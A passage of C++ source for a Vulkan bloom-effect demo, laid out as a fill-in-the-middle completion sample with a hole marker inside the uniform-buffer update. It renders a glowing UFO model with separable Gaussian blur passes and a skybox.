horizontal one. 
// While it's possible to blur in one pass, this method is widely used as it // requires far fewer samples to generate the blur void buildOffscreenCommandBuffer() { if (offscreenPass.commandBuffer == VK_NULL_HANDLE) { offscreenPass.commandBuffer = VulkanExampleBase::createCommandBuffer(VK_COMMAND_BUFFER_LEVEL_PRIMARY, false); } if (offscreenPass.semaphore == VK_NULL_HANDLE) { VkSemaphoreCreateInfo semaphoreCreateInfo = vkTools::initializers::semaphoreCreateInfo(); VK_CHECK_RESULT(vkCreateSemaphore(device, &semaphoreCreateInfo, nullptr, &offscreenPass.semaphore)); } VkCommandBufferBeginInfo cmdBufInfo = vkTools::initializers::commandBufferBeginInfo(); // First pass: Render glow parts of the model (separate mesh) // ------------------------------------------------------------------------------------------------------- VkClearValue clearValues[2]; clearValues[0].color = { { 0.0f, 0.0f, 0.0f, 1.0f } }; clearValues[1].depthStencil = { 1.0f, 0 }; VkRenderPassBeginInfo renderPassBeginInfo = vkTools::initializers::renderPassBeginInfo(); renderPassBeginInfo.renderPass = offscreenPass.renderPass; renderPassBeginInfo.framebuffer = offscreenPass.framebuffers[0].framebuffer; renderPassBeginInfo.renderArea.extent.width = offscreenPass.width; renderPassBeginInfo.renderArea.extent.height = offscreenPass.height; renderPassBeginInfo.clearValueCount = 2; renderPassBeginInfo.pClearValues = clearValues; VK_CHECK_RESULT(vkBeginCommandBuffer(offscreenPass.commandBuffer, &cmdBufInfo)); VkViewport viewport = vkTools::initializers::viewport((float)offscreenPass.width, (float)offscreenPass.height, 0.0f, 1.0f); vkCmdSetViewport(offscreenPass.commandBuffer, 0, 1, &viewport); VkRect2D scissor = vkTools::initializers::rect2D(offscreenPass.width, offscreenPass.height, 0, 0); vkCmdSetScissor(offscreenPass.commandBuffer, 0, 1, &scissor); vkCmdBeginRenderPass(offscreenPass.commandBuffer, &renderPassBeginInfo, VK_SUBPASS_CONTENTS_INLINE); vkCmdBindDescriptorSets(offscreenPass.commandBuffer, VK_PIPELINE_BIND_POINT_GRAPHICS, pipelineLayout, 0, 1, &descriptorSets.scene, 0, NULL); vkCmdBindPipeline(offscreenPass.commandBuffer, VK_PIPELINE_BIND_POINT_GRAPHICS, pipelines.glowPass); VkDeviceSize offsets[1] = { 0 }; vkCmdBindVertexBuffers(offscreenPass.commandBuffer, VERTEX_BUFFER_BIND_ID, 1, &meshes.ufoGlow.vertices.buf, offsets); vkCmdBindIndexBuffer(offscreenPass.commandBuffer, meshes.ufoGlow.indices.buf, 0, VK_INDEX_TYPE_UINT32); vkCmdDrawIndexed(offscreenPass.commandBuffer, meshes.ufoGlow.indexCount, 1, 0, 0, 0); vkCmdEndRenderPass(offscreenPass.commandBuffer); // Second pass: Render contents of the first pass into second framebuffer and apply a vertical blur // This is the first blur pass, the horizontal blur is applied when rendering on top of the scene // ------------------------------------------------------------------------------------------------------- renderPassBeginInfo.framebuffer = offscreenPass.framebuffers[1].framebuffer; vkCmdBeginRenderPass(offscreenPass.commandBuffer, &renderPassBeginInfo, VK_SUBPASS_CONTENTS_INLINE); // Draw a fullscreen quad that samples the glow pass output and applies the vertical blur vkCmdBindDescriptorSets(offscreenPass.commandBuffer, VK_PIPELINE_BIND_POINT_GRAPHICS, pipelineLayout, 0, 1, &descriptorSets.verticalBlur, 0, NULL); vkCmdBindPipeline(offscreenPass.commandBuffer, VK_PIPELINE_BIND_POINT_GRAPHICS, pipelines.blurVert); vkCmdBindVertexBuffers(offscreenPass.commandBuffer, VERTEX_BUFFER_BIND_ID, 1, &meshes.quad.vertices.buf, offsets); vkCmdBindIndexBuffer(offscreenPass.commandBuffer, meshes.quad.indices.buf, 0, VK_INDEX_TYPE_UINT32); 
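// The quad drawn below runs the gaussblur fragment shader, which ships as SPIR-V and is loaded in preparePipelines().
// A minimal sketch of a separable Gaussian blur pass, assuming illustrative names texDim and weight[] (they are not
// taken from this example), driven by the UBOBlur values declared above:
//   vec2 dir = (ubo.horizontal == 1) ? vec2(ubo.blurScale / texDim.x, 0.0) : vec2(0.0, ubo.blurScale / texDim.y);
//   vec3 result = texture(samplerColor, inUV).rgb * weight[0];
//   for (int i = 1; i < 5; ++i) {
//       result += texture(samplerColor, inUV + dir * float(i)).rgb * weight[i] * ubo.blurStrength;
//       result += texture(samplerColor, inUV - dir * float(i)).rgb * weight[i] * ubo.blurStrength;
//   }
// Blurring one axis per pass costs 2*N texture reads per fragment instead of N*N for a full 2D kernel,
// which is why the vertical and horizontal blurs are rendered as separate passes.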
vkCmdDrawIndexed(offscreenPass.commandBuffer, meshes.quad.indexCount, 1, 0, 0, 0); vkCmdEndRenderPass(offscreenPass.commandBuffer); VK_CHECK_RESULT(vkEndCommandBuffer(offscreenPass.commandBuffer)); } void reBuildCommandBuffers() { if (!checkCommandBuffers()) { destroyCommandBuffers(); createCommandBuffers(); } buildCommandBuffers(); } void buildCommandBuffers() { VkCommandBufferBeginInfo cmdBufInfo = vkTools::initializers::commandBufferBeginInfo(); VkClearValue clearValues[2]; clearValues[0].color = defaultClearColor; clearValues[1].depthStencil = { 1.0f, 0 }; VkRenderPassBeginInfo renderPassBeginInfo = vkTools::initializers::renderPassBeginInfo(); renderPassBeginInfo.renderPass = renderPass; renderPassBeginInfo.renderArea.offset.x = 0; renderPassBeginInfo.renderArea.offset.y = 0; renderPassBeginInfo.renderArea.extent.width = width; renderPassBeginInfo.renderArea.extent.height = height; renderPassBeginInfo.clearValueCount = 2; renderPassBeginInfo.pClearValues = clearValues; for (int32_t i = 0; i < drawCmdBuffers.size(); ++i) { // Set target frame buffer renderPassBeginInfo.framebuffer = frameBuffers[i]; VK_CHECK_RESULT(vkBeginCommandBuffer(drawCmdBuffers[i], &cmdBufInfo)); vkCmdBeginRenderPass(drawCmdBuffers[i], &renderPassBeginInfo, VK_SUBPASS_CONTENTS_INLINE); VkViewport viewport = vkTools::initializers::viewport((float)width, (float)height, 0.0f, 1.0f); vkCmdSetViewport(drawCmdBuffers[i], 0, 1, &viewport); VkRect2D scissor = vkTools::initializers::rect2D(width, height, 0, 0); vkCmdSetScissor(drawCmdBuffers[i], 0, 1, &scissor); VkDeviceSize offsets[1] = { 0 }; // Skybox vkCmdBindDescriptorSets(drawCmdBuffers[i], VK_PIPELINE_BIND_POINT_GRAPHICS, pipelineLayout, 0, 1, &descriptorSets.skyBox, 0, NULL); vkCmdBindPipeline(drawCmdBuffers[i], VK_PIPELINE_BIND_POINT_GRAPHICS, pipelines.skyBox); vkCmdBindVertexBuffers(drawCmdBuffers[i], VERTEX_BUFFER_BIND_ID, 1, &meshes.skyBox.vertices.buf, offsets); vkCmdBindIndexBuffer(drawCmdBuffers[i], meshes.skyBox.indices.buf, 0, VK_INDEX_TYPE_UINT32); vkCmdDrawIndexed(drawCmdBuffers[i], meshes.skyBox.indexCount, 1, 0, 0, 0); // 3D scene vkCmdBindDescriptorSets(drawCmdBuffers[i], VK_PIPELINE_BIND_POINT_GRAPHICS, pipelineLayout, 0, 1, &descriptorSets.scene, 0, NULL); vkCmdBindPipeline(drawCmdBuffers[i], VK_PIPELINE_BIND_POINT_GRAPHICS, pipelines.phongPass); vkCmdBindVertexBuffers(drawCmdBuffers[i], VERTEX_BUFFER_BIND_ID, 1, &meshes.ufo.vertices.buf, offsets); vkCmdBindIndexBuffer(drawCmdBuffers[i], meshes.ufo.indices.buf, 0, VK_INDEX_TYPE_UINT32); vkCmdDrawIndexed(drawCmdBuffers[i], meshes.ufo.indexCount, 1, 0, 0, 0); // Render the (vertically blurred) contents of the second framebuffer on top of the scene, applying a horizontal blur // ------------------------------------------------------------------------------------------------------- if (bloom) { vkCmdBindDescriptorSets(drawCmdBuffers[i], VK_PIPELINE_BIND_POINT_GRAPHICS, pipelineLayout, 0, 1, &descriptorSets.horizontalBlur, 0, NULL); vkCmdBindPipeline(drawCmdBuffers[i], VK_PIPELINE_BIND_POINT_GRAPHICS, pipelines.blurHorz); vkCmdBindVertexBuffers(drawCmdBuffers[i], VERTEX_BUFFER_BIND_ID, 1, &meshes.quad.vertices.buf, offsets); vkCmdBindIndexBuffer(drawCmdBuffers[i], meshes.quad.indices.buf, 0, VK_INDEX_TYPE_UINT32); vkCmdDrawIndexed(drawCmdBuffers[i], meshes.quad.indexCount, 1, 0, 0, 0); } vkCmdEndRenderPass(drawCmdBuffers[i]); VK_CHECK_RESULT(vkEndCommandBuffer(drawCmdBuffers[i])); } if (bloom) { buildOffscreenCommandBuffer(); } } void loadAssets() { 
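// The UFO model is loaded twice: meshes.ufo is the full mesh drawn in the scene pass, while meshes.ufoGlow
// contains only the glowing parts that are rendered into the offscreen framebuffer and blurred;
// the cube mesh and the space cubemap back the skybox.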
loadMesh(getAssetPath() + "models/retroufo.dae", &meshes.ufo, vertexLayout, 0.05f); loadMesh(getAssetPath() + "models/retroufo_glow.dae", &meshes.ufoGlow, vertexLayout, 0.05f); loadMesh(getAssetPath() + "models/cube.obj", &meshes.skyBox, vertexLayout, 1.0f); textureLoader->loadCubemap(getAssetPath() + "textures/cubemap_space.ktx", VK_FORMAT_R8G8B8A8_UNORM, &textures.cubemap); } // Setup vertices for a single uv-mapped quad void generateQuad() { struct Vertex { float pos[3]; float uv[2]; float col[3]; float normal[3]; }; #define QUAD_COLOR_NORMAL { 1.0f, 1.0f, 1.0f }, { 0.0f, 0.0f, 1.0f } std::vector<Vertex> vertexBuffer = { { { 1.0f, 1.0f, 0.0f },{ 1.0f, 1.0f }, QUAD_COLOR_NORMAL }, { { 0.0f, 1.0f, 0.0f },{ 0.0f, 1.0f }, QUAD_COLOR_NORMAL }, { { 0.0f, 0.0f, 0.0f },{ 0.0f, 0.0f }, QUAD_COLOR_NORMAL }, { { 1.0f, 0.0f, 0.0f },{ 1.0f, 0.0f }, QUAD_COLOR_NORMAL } }; #undef QUAD_COLOR_NORMAL createBuffer( VK_BUFFER_USAGE_VERTEX_BUFFER_BIT, vertexBuffer.size() * sizeof(Vertex), vertexBuffer.data(), &meshes.quad.vertices.buf, &meshes.quad.vertices.mem); // Setup indices std::vector<uint32_t> indexBuffer = { 0,1,2, 2,3,0 }; meshes.quad.indexCount = indexBuffer.size(); createBuffer( VK_BUFFER_USAGE_INDEX_BUFFER_BIT, indexBuffer.size() * sizeof(uint32_t), indexBuffer.data(), &meshes.quad.indices.buf, &meshes.quad.indices.mem); } void setupVertexDescriptions() { // Binding description // Same for all meshes used in this example vertices.bindingDescriptions.resize(1); vertices.bindingDescriptions[0] = vkTools::initializers::vertexInputBindingDescription( VERTEX_BUFFER_BIND_ID, vkMeshLoader::vertexSize(vertexLayout), VK_VERTEX_INPUT_RATE_VERTEX); // Attribute descriptions vertices.attributeDescriptions.resize(4); // Location 0 : Position vertices.attributeDescriptions[0] = vkTools::initializers::vertexInputAttributeDescription( VERTEX_BUFFER_BIND_ID, 0, VK_FORMAT_R32G32B32_SFLOAT, 0); // Location 1 : Texture coordinates vertices.attributeDescriptions[1] = vkTools::initializers::vertexInputAttributeDescription( VERTEX_BUFFER_BIND_ID, 1, VK_FORMAT_R32G32_SFLOAT, sizeof(float) * 3); // Location 2 : Color vertices.attributeDescriptions[2] = vkTools::initializers::vertexInputAttributeDescription( VERTEX_BUFFER_BIND_ID, 2, VK_FORMAT_R32G32B32_SFLOAT, sizeof(float) * 5); // Location 3 : Normal vertices.attributeDescriptions[3] = vkTools::initializers::vertexInputAttributeDescription( VERTEX_BUFFER_BIND_ID, 3, VK_FORMAT_R32G32B32_SFLOAT, sizeof(float) * 8); vertices.inputState = vkTools::initializers::pipelineVertexInputStateCreateInfo(); vertices.inputState.vertexBindingDescriptionCount = vertices.bindingDescriptions.size(); vertices.inputState.pVertexBindingDescriptions = vertices.bindingDescriptions.data(); vertices.inputState.vertexAttributeDescriptionCount = vertices.attributeDescriptions.size(); vertices.inputState.pVertexAttributeDescriptions = vertices.attributeDescriptions.data(); } void setupDescriptorPool() { std::vector<VkDescriptorPoolSize> poolSizes = { vkTools::initializers::descriptorPoolSize(VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 8), vkTools::initializers::descriptorPoolSize(VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 6) }; VkDescriptorPoolCreateInfo descriptorPoolInfo = vkTools::initializers::descriptorPoolCreateInfo( poolSizes.size(), poolSizes.data(), 5); VK_CHECK_RESULT(vkCreateDescriptorPool(device, &descriptorPoolInfo, nullptr, &descriptorPool)); } void setupDescriptorSetLayout() { // Textured quad pipeline layout std::vector<VkDescriptorSetLayoutBinding> setLayoutBindings = { // Binding 0 : 
Vertex shader uniform buffer vkTools::initializers::descriptorSetLayoutBinding( VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, VK_SHADER_STAGE_VERTEX_BIT, 0), // Binding 1 : Fragment shader image sampler vkTools::initializers::descriptorSetLayoutBinding( VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, VK_SHADER_STAGE_FRAGMENT_BIT, 1), // Binding 2 : Framgnet shader image sampler vkTools::initializers::descriptorSetLayoutBinding( VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, VK_SHADER_STAGE_FRAGMENT_BIT, 2), }; VkDescriptorSetLayoutCreateInfo descriptorLayout = vkTools::initializers::descriptorSetLayoutCreateInfo( setLayoutBindings.data(), setLayoutBindings.size()); VK_CHECK_RESULT(vkCreateDescriptorSetLayout(device, &descriptorLayout, nullptr, &descriptorSetLayout)); VkPipelineLayoutCreateInfo pPipelineLayoutCreateInfo = vkTools::initializers::pipelineLayoutCreateInfo( &descriptorSetLayout, 1); VK_CHECK_RESULT(vkCreatePipelineLayout(device, &pPipelineLayoutCreateInfo, nullptr, &pipelineLayout)); } void setupDescriptorSet() { VkDescriptorSetAllocateInfo allocInfo = vkTools::initializers::descriptorSetAllocateInfo( descriptorPool, &descriptorSetLayout, 1); std::vector<VkWriteDescriptorSet> writeDescriptorSets; // Full screen blur descriptor sets // Vertical blur VK_CHECK_RESULT(vkAllocateDescriptorSets(device, &allocInfo, &descriptorSets.verticalBlur)); writeDescriptorSets = { // Binding 0: Vertex shader uniform buffer vkTools::initializers::writeDescriptorSet(descriptorSets.verticalBlur, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 0, &uniformData.vsScene.descriptor), // Binding 1: Fragment shader texture sampler vkTools::initializers::writeDescriptorSet(descriptorSets.verticalBlur, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 1, &offscreenPass.framebuffers[0].descriptor), // Binding 2: Fragment shader uniform buffer vkTools::initializers::writeDescriptorSet(descriptorSets.verticalBlur, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 2, &uniformData.fsVertBlur.descriptor) }; vkUpdateDescriptorSets(device, writeDescriptorSets.size(), writeDescriptorSets.data(), 0, NULL); // Horizontal blur VK_CHECK_RESULT(vkAllocateDescriptorSets(device, &allocInfo, &descriptorSets.horizontalBlur)); writeDescriptorSets = { // Binding 0: Vertex shader uniform buffer vkTools::initializers::writeDescriptorSet(descriptorSets.horizontalBlur, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 0, &uniformData.vsScene.descriptor), // Binding 1: Fragment shader texture sampler vkTools::initializers::writeDescriptorSet(descriptorSets.horizontalBlur, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 1, &offscreenPass.framebuffers[1].descriptor), // Binding 2: Fragment shader uniform buffer vkTools::initializers::writeDescriptorSet(descriptorSets.horizontalBlur, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 2, &uniformData.fsHorzBlur.descriptor) }; vkUpdateDescriptorSets(device, writeDescriptorSets.size(), writeDescriptorSets.data(), 0, NULL); // 3D scene VK_CHECK_RESULT(vkAllocateDescriptorSets(device, &allocInfo, &descriptorSets.scene)); writeDescriptorSets = { // Binding 0: Vertex shader uniform buffer vkTools::initializers::writeDescriptorSet(descriptorSets.scene, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 0, &uniformData.vsFullScreen.descriptor) }; vkUpdateDescriptorSets(device, writeDescriptorSets.size(), writeDescriptorSets.data(), 0, NULL); // Skybox VK_CHECK_RESULT(vkAllocateDescriptorSets(device, &allocInfo, &descriptorSets.skyBox)); writeDescriptorSets = { // Binding 0: Vertex shader uniform buffer vkTools::initializers::writeDescriptorSet(descriptorSets.skyBox, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 0, 
&uniformData.vsSkyBox.descriptor), // Binding 1: Fragment shader texture sampler vkTools::initializers::writeDescriptorSet(descriptorSets.skyBox, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 1, &textures.cubemap.descriptor), }; vkUpdateDescriptorSets(device, writeDescriptorSets.size(), writeDescriptorSets.data(), 0, NULL); } void preparePipelines() { VkPipelineInputAssemblyStateCreateInfo inputAssemblyState = vkTools::initializers::pipelineInputAssemblyStateCreateInfo( VK_PRIMITIVE_TOPOLOGY_TRIANGLE_LIST, 0, VK_FALSE); VkPipelineRasterizationStateCreateInfo rasterizationState = vkTools::initializers::pipelineRasterizationStateCreateInfo( VK_POLYGON_MODE_FILL, VK_CULL_MODE_NONE, VK_FRONT_FACE_CLOCKWISE, 0); VkPipelineColorBlendAttachmentState blendAttachmentState = vkTools::initializers::pipelineColorBlendAttachmentState( 0xf, VK_FALSE); VkPipelineColorBlendStateCreateInfo colorBlendState = vkTools::initializers::pipelineColorBlendStateCreateInfo( 1, &blendAttachmentState); VkPipelineDepthStencilStateCreateInfo depthStencilState = vkTools::initializers::pipelineDepthStencilStateCreateInfo( VK_TRUE, VK_TRUE, VK_COMPARE_OP_LESS_OR_EQUAL); VkPipelineViewportStateCreateInfo viewportState = vkTools::initializers::pipelineViewportStateCreateInfo(1, 1, 0); VkPipelineMultisampleStateCreateInfo multisampleState = vkTools::initializers::pipelineMultisampleStateCreateInfo( VK_SAMPLE_COUNT_1_BIT, 0); std::vector<VkDynamicState> dynamicStateEnables = { VK_DYNAMIC_STATE_VIEWPORT, VK_DYNAMIC_STATE_SCISSOR }; VkPipelineDynamicStateCreateInfo dynamicState = vkTools::initializers::pipelineDynamicStateCreateInfo( dynamicStateEnables.data(), dynamicStateEnables.size(), 0); std::array<VkPipelineShaderStageCreateInfo, 2> shaderStages; // Vertical gauss blur // Load shaders shaderStages[0] = loadShader(getAssetPath() + "shaders/bloom/gaussblur.vert.spv", VK_SHADER_STAGE_VERTEX_BIT); shaderStages[1] = loadShader(getAssetPath() + "shaders/bloom/gaussblur.frag.spv", VK_SHADER_STAGE_FRAGMENT_BIT); VkGraphicsPipelineCreateInfo pipelineCreateInfo = vkTools::initializers::pipelineCreateInfo( pipelineLayout, renderPass, 0); pipelineCreateInfo.pVertexInputState = &vertices.inputState; pipelineCreateInfo.pInputAssemblyState = &inputAssemblyState; pipelineCreateInfo.pRasterizationState = &rasterizationState; pipelineCreateInfo.pColorBlendState = &colorBlendState; pipelineCreateInfo.pMultisampleState = &multisampleState; pipelineCreateInfo.pViewportState = &viewportState; pipelineCreateInfo.pDepthStencilState = &depthStencilState; pipelineCreateInfo.pDynamicState = &dynamicState; pipelineCreateInfo.stageCount = shaderStages.size(); pipelineCreateInfo.pStages = shaderStages.data(); // Additive blending blendAttachmentState.colorWriteMask = 0xF; blendAttachmentState.blendEnable = VK_TRUE; blendAttachmentState.colorBlendOp = VK_BLEND_OP_ADD; blendAttachmentState.srcColorBlendFactor = VK_BLEND_FACTOR_ONE; blendAttachmentState.dstColorBlendFactor = VK_BLEND_FACTOR_ONE; blendAttachmentState.alphaBlendOp = VK_BLEND_OP_ADD; blendAttachmentState.srcAlphaBlendFactor = VK_BLEND_FACTOR_SRC_ALPHA; blendAttachmentState.dstAlphaBlendFactor = VK_BLEND_FACTOR_DST_ALPHA; pipelineCreateInfo.renderPass = offscreenPass.renderPass; VK_CHECK_RESULT(vkCreateGraphicsPipelines(device, pipelineCache, 1, &pipelineCreateInfo, nullptr, &pipelines.blurVert)); pipelineCreateInfo.renderPass = renderPass; VK_CHECK_RESULT(vkCreateGraphicsPipelines(device, pipelineCache, 1, &pipelineCreateInfo, nullptr, &pipelines.blurHorz)); // Phong pass (3D model) 
shaderStages[0] = loadShader(getAssetPath() + "shaders/bloom/phongpass.vert.spv", VK_SHADER_STAGE_VERTEX_BIT); shaderStages[1] = loadShader(getAssetPath() + "shaders/bloom/phongpass.frag.spv", VK_SHADER_STAGE_FRAGMENT_BIT); blendAttachmentState.blendEnable = VK_FALSE; depthStencilState.depthWriteEnable = VK_TRUE; rasterizationState.cullMode = VK_CULL_MODE_BACK_BIT; pipelineCreateInfo.renderPass = renderPass; VK_CHECK_RESULT(vkCreateGraphicsPipelines(device, pipelineCache, 1, &pipelineCreateInfo, nullptr, &pipelines.phongPass)); // Color only pass (offscreen blur base) shaderStages[0] = loadShader(getAssetPath() + "shaders/bloom/colorpass.vert.spv", VK_SHADER_STAGE_VERTEX_BIT); shaderStages[1] = loadShader(getAssetPath() + "shaders/bloom/colorpass.frag.spv", VK_SHADER_STAGE_FRAGMENT_BIT); pipelineCreateInfo.renderPass = offscreenPass.renderPass; VK_CHECK_RESULT(vkCreateGraphicsPipelines(device, pipelineCache, 1, &pipelineCreateInfo, nullptr, &pipelines.glowPass)); // Skybox (cubemap) shaderStages[0] = loadShader(getAssetPath() + "shaders/bloom/skybox.vert.spv", VK_SHADER_STAGE_VERTEX_BIT); shaderStages[1] = loadShader(getAssetPath() + "shaders/bloom/skybox.frag.spv", VK_SHADER_STAGE_FRAGMENT_BIT); depthStencilState.depthWriteEnable = VK_FALSE; rasterizationState.cullMode = VK_CULL_MODE_FRONT_BIT; pipelineCreateInfo.renderPass = renderPass; VK_CHECK_RESULT(vkCreateGraphicsPipelines(device, pipelineCache, 1, &pipelineCreateInfo, nullptr, &pipelines.skyBox)); } // Prepare and initialize uniform buffer containing shader uniforms void prepareUniformBuffers() { // Phong and color pass vertex shader uniform buffer createBuffer( VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT, VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | VK_MEMORY_PROPERTY_HOST_COHERENT_BIT, sizeof(ubos.scene), &ubos.scene, &uniformData.vsScene.buffer, &uniformData.vsScene.memory, &uniformData.vsScene.descriptor); // Fullscreen quad display vertex shader uniform buffer createBuffer( VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT, VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | VK_MEMORY_PROPERTY_HOST_COHERENT_BIT, sizeof(ubos.fullscreen), &ubos.fullscreen, &uniformData.vsFullScreen.buffer, &uniformData.vsFullScreen.memory, &uniformData.vsFullScreen.descriptor); // Fullscreen quad fragment shader uniform buffers // Vertical blur createBuffer( VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT, VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | VK_MEMORY_PROPERTY_HOST_COHERENT_BIT, sizeof(ubos.vertBlur), &ubos.vertBlur, &uniformData.fsVertBlur.buffer, &uniformData.fsVertBlur.memory, &uniformData.fsVertBlur.descriptor); // Horizontal blur createBuffer( VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT, VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | VK_MEMORY_PROPERTY_HOST_COHERENT_BIT, sizeof(ubos.horzBlur), &ubos.horzBlur, &uniformData.fsHorzBlur.buffer, &uniformData.fsHorzBlur.memory, &uniformData.fsHorzBlur.descriptor); // Skybox createBuffer( VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT, VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | VK_MEMORY_PROPERTY_HOST_COHERENT_BIT, sizeof(ubos.skyBox), &ubos.skyBox, &uniformData.vsSkyBox.buffer, &uniformData.vsSkyBox.memory, &uniformData.vsSkyBox.descriptor); // Intialize uniform buffers updateUniformBuffersScene(); updateUniformBuffersScreen(); } // Update uniform buffers for rendering the 3D scene void updateUniformBuffersScene() { // UFO ubos.fullscreen.projection = glm::perspective(glm::radians(45.0f), (float)width / (float)height, 0.1f, 256.0f); glm::mat4 viewMatrix = glm::translate(glm::mat4(), glm::vec3(0.0f, -1.0f, zoom)); ubos.fullscreen.model = viewMatrix * glm::translate(glm::mat4(), 
glm::vec3(sin(glm::radians(timer * 360.0f)) * 0.25f, 0.0f, cos(glm::radians(timer * 360.0f)) * 0.25f) + cameraPos); ubos.fullscreen.model = glm::rotate(ubos.fullscreen.model, glm::radians(rotation.x), glm::vec3(1.0f, 0.0f, 0.0f)); ubos.fullscreen.model = glm::rotate(ubos.fullscreen.model, -sinf(glm::radians(timer * 360.0f)) * 0.15f, glm::vec3(1.0f, 0.0f, 0.0f)); ubos.fullscreen.model = glm::rotate(ubos.fullscreen.model, glm::radians(rotation.y), glm::vec3(0.0f, 1.0f, 0.0f)); ubos.fullscreen.model = glm::rotate(ubos.fullscreen.model, glm::radians(timer * 360.0f), glm::vec3(0.0f, 1.0f, 0.0f)); ubos.fullscreen.model = glm::rotate(ubos.fullscreen.model, glm::radians(rotation.z), glm::vec3(0.0f, 0.0f, 1.0f)); uint8_t *pData; VK_CHECK_RESULT(vkMapMemory(device, uniformData.vsFullScreen.memory, 0, sizeof(ubos.fullscreen), 0, (void **)&pData)); memcpy(pData, &ubos.fullscreen, sizeof(ubos.fullscreen)); vkUnmapMemory(device, uniformData.vsFullScreen.memory); // Skybox ubos.skyBox.projection = glm::perspective(glm::radians(45.0f), (float)width / (float)height, 0.1f, 256.0f); ubos.skyBox.model = glm::mat4(); ubos.skyBox.model = glm::rotate(ubos.skyBox.model, glm::radians(rotation.x), glm::vec3(1.0f, 0.0f, 0.0f)); ubos.skyBox.model = glm::rotate(ubos.skyBox.model, glm::radians(rotation.y), glm::vec3(0.0f, 1.0f, 0.0f)); ubos.skyBox.model = glm::rotate(ubos.skyBox.model, glm::radians(rotation.z), glm::vec3(0.0f, 0.0f, 1.0f)); VK_CHECK_RESULT(vkMapMemory(device, uniformData.vsSkyBox.memory, 0, sizeof(ubos.skyBox), 0, (void **)&pData)); memcpy(pData, &ubos.skyBox, sizeof(ubos.skyBox)); vkUnmapMemory(device, uniformData.vsSkyBox.memory); } // Update uniform buffers for the fullscreen quad void updateUniformBuffersScreen() { // Vertex shader ubos.scene.projection = glm::ortho(0.0f, 1.0f, 0.0f, 1.0f, -1.0f, 1.0f); ubos.scene.model = glm::mat4(); uint8_t *pData; VK_CHECK_RESULT(vkMapMemory(device, uniformData.vsScene.memory, 0, sizeof(ubos.scene), 0, (void **)&pData)); memcpy(pData, &ubos.scene, sizeof(ubos.scene)); vkUnmapMemory(device, uniformData.vsScene.memory); // Fragment shader // Vertical<|fim▁hole|> memcpy(pData, &ubos.vertBlur, sizeof(ubos.vertBlur)); vkUnmapMemory(device, uniformData.fsVertBlur.memory); // Horizontal ubos.horzBlur.horizontal = 1; VK_CHECK_RESULT(vkMapMemory(device, uniformData.fsHorzBlur.memory, 0, sizeof(ubos.horzBlur), 0, (void **)&pData)); memcpy(pData, &ubos.horzBlur, sizeof(ubos.horzBlur)); vkUnmapMemory(device, uniformData.fsHorzBlur.memory); } void draw() { VulkanExampleBase::prepareFrame(); // The scene render command buffer has to wait for the offscreen rendering to be finished before we can use the framebuffer // color image for sampling during final rendering // To ensure this we use a dedicated offscreen synchronization semaphore that will be signaled when offscreen rendering has been finished // This is necessary as an implementation may start both command buffers at the same time, there is no guarantee // that command buffers will be executed in the order they have been submitted by the application // Offscreen rendering // Wait for swap chain presentation to finish submitInfo.pWaitSemaphores = &semaphores.presentComplete; // Signal ready with offscreen semaphore submitInfo.pSignalSemaphores = &offscreenPass.semaphore; // Submit work submitInfo.commandBufferCount = 1; submitInfo.pCommandBuffers = &offscreenPass.commandBuffer; VK_CHECK_RESULT(vkQueueSubmit(queue, 1, &submitInfo, VK_NULL_HANDLE)); // Scene rendering // Wait for offscreen semaphore 
submitInfo.pWaitSemaphores = &offscreenPass.semaphore; // Signal ready with render complete semaphpre submitInfo.pSignalSemaphores = &semaphores.renderComplete; // Submit work submitInfo.pCommandBuffers = &drawCmdBuffers[currentBuffer]; VK_CHECK_RESULT(vkQueueSubmit(queue, 1, &submitInfo, VK_NULL_HANDLE)); VulkanExampleBase::submitFrame(); } void prepare() { VulkanExampleBase::prepare(); loadAssets(); generateQuad(); setupVertexDescriptions(); prepareUniformBuffers(); prepareOffscreen(); setupDescriptorSetLayout(); preparePipelines(); setupDescriptorPool(); setupDescriptorSet(); buildCommandBuffers(); prepared = true; } virtual void render() { if (!prepared) return; draw(); if (!paused) { updateUniformBuffersScene(); } } virtual void viewChanged() { updateUniformBuffersScene(); updateUniformBuffersScreen(); } virtual void keyPressed(uint32_t keyCode) { switch (keyCode) { case KEY_KPADD: case GAMEPAD_BUTTON_R1: changeBlurScale(0.25f); break; case KEY_KPSUB: case GAMEPAD_BUTTON_L1: changeBlurScale(-0.25f); break; case KEY_B: case GAMEPAD_BUTTON_A: toggleBloom(); break; } } virtual void getOverlayText(VulkanTextOverlay *textOverlay) { #if defined(__ANDROID__) textOverlay->addText("Press \"L1/R1\" to change blur scale", 5.0f, 85.0f, VulkanTextOverlay::alignLeft); textOverlay->addText("Press \"Button A\" to toggle bloom", 5.0f, 105.0f, VulkanTextOverlay::alignLeft); #else textOverlay->addText("Press \"NUMPAD +/-\" to change blur scale", 5.0f, 85.0f, VulkanTextOverlay::alignLeft); textOverlay->addText("Press \"B\" to toggle bloom", 5.0f, 105.0f, VulkanTextOverlay::alignLeft); #endif } void changeBlurScale(float delta) { ubos.vertBlur.blurScale += delta; ubos.horzBlur.blurScale += delta; updateUniformBuffersScreen(); } void toggleBloom() { bloom = !bloom; reBuildCommandBuffers(); } }; VULKAN_EXAMPLE_MAIN()<|fim▁end|>
